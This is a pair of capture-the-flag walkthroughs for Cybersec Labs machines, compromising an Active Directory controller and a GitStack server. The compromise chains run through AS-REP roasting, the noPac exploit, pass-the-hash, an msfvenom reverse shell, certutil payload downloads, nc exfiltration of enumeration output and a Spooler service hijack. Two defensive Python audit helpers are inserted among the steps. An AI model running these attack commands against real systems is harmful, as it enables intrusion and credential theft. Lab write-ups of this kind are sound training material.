Cybersec Labs-ActiveDirectory Brute Walkthrough

After a period of regular privilege escalation attempts, I realized that I made a mistake, but it also made me more impressed and eager to try

Seriously, you'll find it fun

machine ip : 172.31.3.3
my ip : 10.10.0.82

Port information

Open 172.31.3.3:53
Open 172.31.3.3:88
Open 172.31.3.3:135
Open 172.31.3.3:139
Open 172.31.3.3:389
Open 172.31.3.3:445
Open 172.31.3.3:464
Open 172.31.3.3:593
Open 172.31.3.3:636
Open 172.31.3.3:3389
Open 172.31.3.3:5985
Open 172.31.3.3:9389
Open 172.31.3.3:47001
Open 172.31.3.3:49664
Open 172.31.3.3:49665
Open 172.31.3.3:49666
Open 172.31.3.3:49668
Open 172.31.3.3:49671
Open 172.31.3.3:49675
Open 172.31.3.3:49674
Open 172.31.3.3:49682
Open 172.31.3.3:49699
Open 172.31.3.3:49704
Port 389 information
    I find the LDAP port 389 is open, so the first thing I decide to do is collect the LDAP information
    ldapsearch -x -s base namingcontexts -h 172.31.3.3

The DC domain is brute.csl,
and then I need to collect usernames or other DC information

Port 445
    enum4linux 172.31.3.3 -> we can find brute-DC and brute, add them to /etc/hosts, now we can use kerbrute to enumerate some existing users

    ./kerbrute userenum -d brute.csl /lab_test/windows_privilege/tryhard_cyber/brute/old/user --dc 172.31.3.3

We can find four users, and I test for the AS-REP AD vuln
    impacket-GetNPUsers brute.csl/ -usersfile user -dc-ip 172.31.3.3 -format hashcat

We can get the user tess's hash and crack it
    hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
tess : Unique1
I tried impacket-GetUserSPNs and impacket-secretsdump but both failed

Let's run smbmap and find something?

    smbclient //172.31.3.3/SYSVOL -U "tess"
and nothing is valuable, but I can run evil-winrm to log in to the tess account.

### Privilege to administrator way 1
    noPac -> CVE-2021-42278
    python3 noPac.py brute.csl/tess:Unique1 -dc-ip 172.31.3.3 --impersonate administrator -use-ldap -dump -just-dc-user administrator
    evil-winrm -i 172.31.3.3 -u 'administrator' -H e2068a39ee8150b697797d6c3e513df7
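Both the AS-REP step (tess had Kerberos pre-authentication disabled) and the noPac step (a machine account renamed without its trailing `$`) leave traces in plain LDAP attributes a defender can audit. The following Python is an added helper, not code from the write-up or from impacket: it parses ldapsearch-style output and reports accounts with `DONT_REQ_PREAUTH` set and computer objects whose `sAMAccountName` lacks the `$`. The LDIF sample is constructed (tess is the lab user; the flag values and WS01/WS02 are made up).

```python
import re

# Added audit helper, not part of the write-up or of impacket. The LDIF below is
# constructed: tess is the lab user, the flag values and WS01/WS02 are made up.
SAMPLE_LDIF = """dn: CN=tess,CN=Users,DC=brute,DC=csl
sAMAccountName: tess
userAccountControl: 4260352

dn: CN=svc_old,CN=Users,DC=brute,DC=csl
sAMAccountName: svc_old
userAccountControl: 4194818

dn: CN=WS01,CN=Computers,DC=brute,DC=csl
objectClass: computer
sAMAccountName: WS01$
userAccountControl: 4096

dn: CN=WS02,CN=Computers,DC=brute,DC=csl
objectClass: computer
sAMAccountName: WS02
userAccountControl: 4096
"""
ACCOUNTDISABLE = 0x0002       # userAccountControl bits, documented AD values
DONT_REQ_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"

def parse_ldif(text):
    """Split ldapsearch output into entries; each attribute maps to a list of values."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            key, _, value = line.partition(": ")
            entry.setdefault(key, []).append(value)
        entries.append(entry)
    return entries

def asrep_roastable(entries):
    """Enabled accounts with DONT_REQ_PREAUTH: the KDC returns an AS-REP crackable offline."""
    hits = []
    for e in entries:
        uac = int(e.get("userAccountControl", ["0"])[0])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            hits.append(e["sAMAccountName"][0])
    return hits

def computers_missing_dollar(entries):
    """Computer objects whose sAMAccountName lacks the trailing '$' (CVE-2021-42278 indicator)."""
    return [e["sAMAccountName"][0] for e in entries
            if "computer" in e.get("objectClass", [])
            and not e["sAMAccountName"][0].endswith("$")]
```

Accounts reported by `asrep_roastable` can be fixed with `Set-ADAccountControl -DoesNotRequirePreAuth $false`; a computer name without the trailing `$` is worth comparing against the DC's name and reviewing together with `ms-DS-MachineAccountQuota`.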

### Privilege to administrator way 2

Run bloodhound.exe and winpeasany.exe to find something.
    certutil -urlcache -split -f http://10.10.0.82:82/SharpHound.exe

    cmd.exe /c "winPEASany.exe > a.txt"   # on the lab machine
    cmd.exe /c "nc.exe 10.10.0.82 9001 < a.txt" # on the lab machine
    nc -lvvp 9001 > peas.txt # on the attacker machine

    cmd.exe /c "SharpHound.exe -c all"
    cmd.exe /c "nc.exe 10.10.0.82 9001 < 20220113052032_BloodHound.zip"
    nc -lvvp 9001 > blod.zip

C:\Users\All Users\ntuser.pol
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
https://sdmsoftware.com/security-related/understanding-group-policy-privilege-escalation-in-cve-2020-1317/

certutil -urlcache -split -f http://10.10.0.82:82/SharpGPOAbuse.exe

### Beyond root
    PASS THE HASH
    impacket-getTGT brute.csl/administrator -hashes e2068a39ee8150b697797d6c3e513df7:e2068a39ee8150b697797d6c3e513df7
    export KRB5CCNAME=./administrator_brute-dc.brute.csl.ccache

    impacket-psexec brute.csl/administrator@brute-dc.brute.csl -k -no-pass

Cybersec Labs-Windows Privilege Stack Walkthrough

machine ip : 172.31.1.12
my ip : 10.10.0.33

Port information 

172.31.1.12:80                     Open
172.31.1.12:139                    Open
172.31.1.12:135                    Open
172.31.1.12:445                    Open
172.31.1.12:3389                   Open
172.31.1.12:5985                   Open
172.31.1.12:47001                  Open
172.31.1.12:49152                  Open
172.31.1.12:49153                  Open
172.31.1.12:49154                  Open
172.31.1.12:49155                  Open
172.31.1.12:49162                  Open
172.31.1.12:49163                  Open
172.31.1.12:49164                  Open

    The first thing I do is test ports 135, 139 and 445 anonymously and try to find some share folders or usernames, but nothing can be found, so I view the website on port 80.

    This is a Django website, and we can find three routes; we can log in to /gitstack/ with default creds, and find the fingerprint is GitStack 2.3.10.

    searchsploit gitstack 2.3.10

The foothold

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.33 LPORT=23 -f exe -o rev.exe
edit the payload => command = "whoami" =>
    certutil -urlcache -split -f http://10.10.0.33/rev.exe
and run it again with the command -> command = "rev.exe" to get a shell -> user: john

We can get the access.txt
access.txt : reb656565983289247427842gtamf6

Privilege to Administrator

I run the systeminfo command and find the machine has 202 patches, and for this reason I wasted some time bypassing patch fixes; I will mention it in the beyond root section

Run winPEAS and find it has a KeePass profile

Install KeePass on my Windows machine; I found it needs a password

I tried KeeFarce first to get the password, but it didn't work

So I use keepass2john to crack it
    keepass2john pass.kdbx >> hash
    john --wordlist=/usr/share/wordlists/rockyou.txt hash --show

The password is princess, now we can open the kdbx file
and copy the password and paste it; the password is secur3_apass262
So use evil-winrm to log in:
    evil-winrm -i 172.31.1.12 -u 'administrator' -p 'secur3_apass262'

Beyond root

As mentioned earlier I wasted a lot of time bypassing patch fixes, so when I get administrator, I log in and change the remote settings to let john log in, because I want to see whether the exploit really does not work
    xfreerdp /u:administrator /p:secur3_apass262 /v:172.31.1.12
    xfreerdp /u:john /p:s3cret123SEc /v:172.31.1.12

When I run beRoot.exe I can find a service named Spooler; this service is a vulnerable service, but it is not running. Even though we can modify the registry, we don't have permission to reboot

    reg add HKLM\SYSTEM\CurrentControlSet\Services\Spooler /v ImagePath /t REG_EXPAND_SZ /d C:\users\john\desktop\rev.exe /f

    sc qc spooler -> we can find it runs as LocalSystem
    sc sdshow spooler
SY means LocalSystem
RP means start service
WP means stop service
So even if we change the service from the registry, we still can't restart it.
But what we can do is elevate administrator to SYSTEM lol

If we can run "sc start spooler", we can get a SYSTEM shell
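The `sc sdshow` output decoded above (SY, RP, WP) is a service security descriptor in SDDL. As an added audit helper, not code from the write-up, this Python parses that format and reports which principals may reconfigure or start a service, which is exactly the combination (change ImagePath, then start) that turns a writable service into a SYSTEM shell. Both SDDL strings are constructed samples: one resembling a default Spooler descriptor and one deliberately weak.

```python
import re

# Added audit helper, not part of the write-up. The first SDDL string is a
# constructed copy of a typical default Spooler descriptor; the second is a
# constructed weak one where Authenticated Users may reconfigure and start it.
DEFAULT_SPOOLER_SD = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                      "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)")
WEAK_SD = "D:(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"

# Service-object meaning of the generic SDDL right tokens (per Microsoft's service security docs).
RIGHTS = {"CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
          "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
          "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
          "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
          "GA": "GENERIC_ALL"}
TRUSTEES = {"SY": "LocalSystem", "BA": "Administrators", "IU": "Interactive",
            "SU": "Service logon", "AU": "Authenticated Users", "WD": "Everyone"}
# Rights that let a non-admin swap the binary or run it: the reg add + sc start chain above.
DANGEROUS = {"CHANGE_CONFIG", "START", "WRITE_DAC", "WRITE_OWNER", "GENERIC_ALL"}
ACE_RE = re.compile(r"\((A|D);[^;]*;([A-Z]*);[^;]*;[^;]*;([^)]+)\)")

def parse_sddl(sddl):
    """Return (ace_type, set_of_right_names, trustee) per ACE in the DACL; the SACL is ignored."""
    aces = []
    dacl = sddl.split("D:", 1)[-1].split("S:", 1)[0]
    for ace_type, rights, trustee in ACE_RE.findall(dacl):
        names = {RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)}
        aces.append((ace_type, names, TRUSTEES.get(trustee, trustee)))
    return aces

def who_can(sddl, right):
    """Trustees granted `right` by an Allow ACE and not taken away by a Deny ACE."""
    allowed = [t for typ, names, t in parse_sddl(sddl) if typ == "A" and right in names]
    denied = {t for typ, names, t in parse_sddl(sddl) if typ == "D" and right in names}
    return [t for t in allowed if t not in denied]

def risky_grants(sddl):
    """Non-admin trustees holding any DANGEROUS right, for alerting or a config review."""
    report = {}
    for typ, names, trustee in parse_sddl(sddl):
        bad = names & DANGEROUS
        if typ == "A" and bad and trustee not in ("LocalSystem", "Administrators"):
            report[trustee] = sorted(bad)
    return report
```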

Finally, I want to remember that I actually spent an hour and a half trying to bypass the patch, "a fool"